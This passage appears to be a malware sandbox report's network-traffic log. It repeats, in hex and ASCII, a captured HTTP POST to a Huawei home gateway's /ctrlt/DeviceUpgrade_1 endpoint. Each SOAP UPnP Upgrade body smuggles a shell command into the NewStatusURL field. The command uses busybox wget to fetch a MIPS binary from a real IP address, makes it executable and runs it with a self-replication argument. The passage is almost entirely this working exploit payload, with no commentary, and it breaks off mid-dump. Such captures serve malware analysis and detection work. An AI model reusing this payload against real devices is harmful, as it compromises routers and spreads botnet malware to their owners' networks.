62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 